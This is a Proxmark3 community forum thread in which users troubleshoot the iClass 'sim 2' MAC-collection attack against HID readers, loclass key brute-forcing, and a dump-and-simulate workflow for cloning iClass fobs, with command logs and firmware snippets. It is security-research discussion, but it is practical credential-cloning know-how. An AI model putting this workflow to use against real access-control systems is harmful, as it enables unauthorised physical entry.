iClass is coming...

Piorun · 2015-11-14 19:16:27

I checked the code and I think my 'fix' does not work because I need to fill 'emulator' table :

		} else if((simulationMode == MODE_FULLSIM || simulationMode == MODE_EXIT_AFTER_MAC) && receivedCmd[0] == ICLASS_CMD_READ_OR_IDENTIFY && len == 4){
			//Read block
			uint16_t blk = receivedCmd[1];
			//Take the data...
			memcpy(data_generic_trace, emulator+(blk << 3),8);
			//Add crc

PM3 needs to response to "Unknown command (len=4): c 5 de 64", so what I should put in sector 5 (this is attack mode 2 so I don't have any card dump yet).

-- update --
I found http://martin.swende.se/blog/Elite-Hacking.html that sector 5 is "Application Issuer Area" (publicly readable) .
Should I read it from the card or rather use some generic value for 'sim 2' attact like this ?
#db# 05: ff ff ff ff ff ff ff ff

Last edited by Piorun (2015-11-14 19:31:58)

Lenox · 2015-11-17 03:29:59

Read the forum about the HID icalss decoding and understand we need the master key to read and write the icalss fob.

My question is:
What kind of blank card or fob is needed to copy the icalss 2k fob?

Thanks in advance.

osaka · 2015-11-17 06:58:28

Lenox wrote:

Read the forum about the HID icalss decoding and understand we need the master key to read and write the icalss fob.
My question is:
What kind of blank card or fob is needed to copy the icalss 2k fob?

Thanks in advance.

You need good quality picopass cards.

Lenox · 2015-11-23 02:24:23

osaka wrote:

You need good quality picopass cards.

Is this the type of fob (picopass) you are talking about?

Last edited by Lenox (2015-11-23 02:25:27)

Lenox · 2015-11-25 04:31:43

Piorun wrote:

PM3 needs to response to "Unknown command (len=4): c 5 de 64", so what I should put in sector 5 (this is attack mode 2 so I don't have any card dump yet).
-- update --
I found http://martin.swende.se/blog/Elite-Hacking.html that sector 5 is "Application Issuer Area" (publicly readable) .
Should I read it from the card or rather use some generic value for 'sim 2' attact like this ?
#db# 05: ff ff ff ff ff ff ff ff

Try to run " hf icalss sim 2" on reader (RP40 SE) , get "Unknown command received from reader (len=4)".
I am using the latest 2.5.0.

swseansw · 2015-11-30 09:56:07

Following the page: http://martin.swende.se/blog/PM3-development.html
I also got the following result:

[== Undefined ==]
proxmark3> hf iclass sim 2 
#db# Going into attack mode, 15 CSNS sent                 
#db# Simulating CSN 000b0ffff7ff12e0                 
Waiting for a response from the proxmark...          
Don't forget to cancel its operation first by pressing on the button          
#db# Unknown command received from reader (len=4): c 1 fa 22 ff fe 5f 2 1c                 
#db# Unknown command received from reader (len=4): c 1 fa 22 ff fe 5f 2 1c

Tried on with pm3-bin-2.5.0

capecode · 2016-03-08 10:12:34

I also followed the instruction from http://martin.swende.se/blog/PM3-development.html

After issued the command "hf iclass sim 2", nothing happened on my PM3. I waited for a minute or two and then preseed button and received this message :

#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Button pressed
Mac responses: 0 MACs obtained (should be 15)
Saved data to 'iclass_mac_attack-2.bin'
proxmark3>

Is this right? Would "hf iclass sim 2" work with standard iClass cards (not elite)?

Aliendennis · 2016-05-16 03:54:57

Dead topic. Haha. So is anyone working on Iclass elite now ?

I have all the things needed as said in this topic. Omnikey, Iclass SE reader, PM3, working Iclass cards, rewritable bank Iclass cards. I got a lot of data collected from my country itself.

So guys lets do this ?

holiman · 2016-05-16 07:50:28

>So is anyone working on Iclass elite now ?

IClass elite is done a long time ago.

I've not been active here for a while but regarding "Unknown command" that's really a misnomer. The protocol handler for iclass expects a few different packets, when something else arrives which it does not handle it prints that. It should instead say "Unhandled command" or "Not implemented command".. So to anyone with problems; after a failure, do a 'hf iclass list' , which will print out the commands and responses.

To be clear: the protocol printout _may_ contain partial or full information to reverse the key. But since it failed (0 MACs obtained) , probably not . Without that trace, it's very difficult to know what failed.

holiman · 2016-05-16 07:53:41

Piorun wrote:

I did the 'fix'

if((simulationMode == MODE_FULLSIM || simulationMode == MODE_EXIT_AFTER_MAC) && receivedCmd[0] == ICLASS_CMD_READ_OR_IDENTIFY && len == 4){

and can obtain 15 MACs

proxmark3> hf icla sim 2
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# CSN: 00 0b 0f ff f7 ff 12 e0
#db# RDR:  (len=09): 05 cf 57 30 21 5f xx xx xx
#db# Simulating CSN 00040e08f7ff12e0
#db# CSN: 00 04 0e 08 f7 ff 12 e0
#db# RDR:  (len=09): 05 6f f0 ee f8 24 xx xx xx
...
#db# Simulating CSN 00050121f7ff12e0
#db# CSN: 00 05 01 21 f7 ff 12 e0
#db# RDR:  (len=09): 05 9f 65 d0 03 8e xx xx xx
#db# Done...
Mac responses: 15 MACs obtained (should be 15)
Saved data to 'iclass_mac_attack-1.bin'
proxmark3>

how ever the brute force attack doesn't work

proxmark3> hf iclass loclass f iclass_mac_attack-2.bin
Bruteforcing byte 1
Bruteforcing byte 0
Bruteforcing byte 69
1234567891011
...
42452462472482492502512522532542550 Failed to recover 3 bytes using the following CSN
CSN = 000b0ffff7ff12e0
The CSN requires > 3 byte bruteforce, not supported
CSN = 00040e08f7ff12e0
HASH1 = 7802000045014545
The CSN requires > 3 byte bruteforce, not supported
CSN = 00090d05f7ff12e0
HASH1 = 7b0300004501xxxx

The bruteforcer expects a certain format on the save-file, don't remember offhand, but it includes the malicious CSN:s used. It then calculates the bruteforce based on those. Have you used a different set of MAC:s than the ordinary attack-MACs ? Because´00040e08f7ff12e0' is not one of the original CSNs, it seems.

[EDIT] Sorry, my bad; https://github.com/Proxmark/proxmark3/blob/master/client/cmdhficlass.c#L120 it actually is. Are you sure it's an elite and not a standard?

Aliendennis · 2016-05-28 09:05:53

'hf iclass sim 2' <- attack reader, get dump

Got the iclass iclass_mac_attack-1.bin
Mac responses: 0 MACs obtained (should be 15)

Got this. I do not know whether this is right or wrong.

'hf iclass loclass f <file>' <- bruteforce dump

hf iclass loclass t - got the key.
hf iclass loclass f - take like ages

'hf iclass dump <key> e' <- dump tag with elite key <key>

hf iclass dump f [FILE ?] k [KEY ?] [CSN ?] [CC ?] e/r ?

'hf iclass eload <dumpfile>' <- load data into pm3

Have not gone into this step yet.

'hf iclass sim 3' <-- full simulation of the dumped tag.

Have not gone into this step yet.

Hopefully I am on the right track. Can someone validate it ?

Go_tus · 2016-06-14 08:20:24

I believe that len=4 command 0x0C, its a read or identify, we have to reply with ACSN.
as c 1 fa 22 ff fe 5f 2 1c => c 1 fa 22 the actual data from the reader
the reader sent read command 0x0C request to read block 1.

Last edited by Go_tus (2016-06-14 08:30:01)

w32.n01 · 2016-08-31 13:52:02

EDIT - started a new thread as advised.

Last edited by w32.n01 (2016-08-31 16:38:29)

iceman · 2016-08-31 16:29:33

I suggest you start a new thread instead.

jramb0 · 2016-11-11 05:53:11

I am also getting the same when running hf iclass sim 2

proxmark3> hf iclass sim 2
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Button pressed
Mac responses: 0 MACs obtained (should be 15)

Proxmark3 community

Announcement

#201 2015-11-14 19:16:27

Re: iClass is coming...

#202 2015-11-17 03:29:59

Re: iClass is coming...

#203 2015-11-17 06:58:28

Re: iClass is coming...

#204 2015-11-23 02:24:23

Re: iClass is coming...

#205 2015-11-25 04:31:43

Re: iClass is coming...

#206 2015-11-30 09:56:07

Re: iClass is coming...

#207 2016-03-08 10:12:34

Re: iClass is coming...

#208 2016-05-16 03:54:57

Re: iClass is coming...

#209 2016-05-16 07:50:28

Re: iClass is coming...

#210 2016-05-16 07:53:41

Re: iClass is coming...

#211 2016-05-28 09:05:53

Re: iClass is coming...

#212 2016-06-14 08:20:24

Re: iClass is coming...

#213 2016-08-31 13:52:02

Re: iClass is coming...

#214 2016-08-31 16:29:33

Re: iClass is coming...

#215 2016-11-11 05:53:11

Re: iClass is coming...

Board footer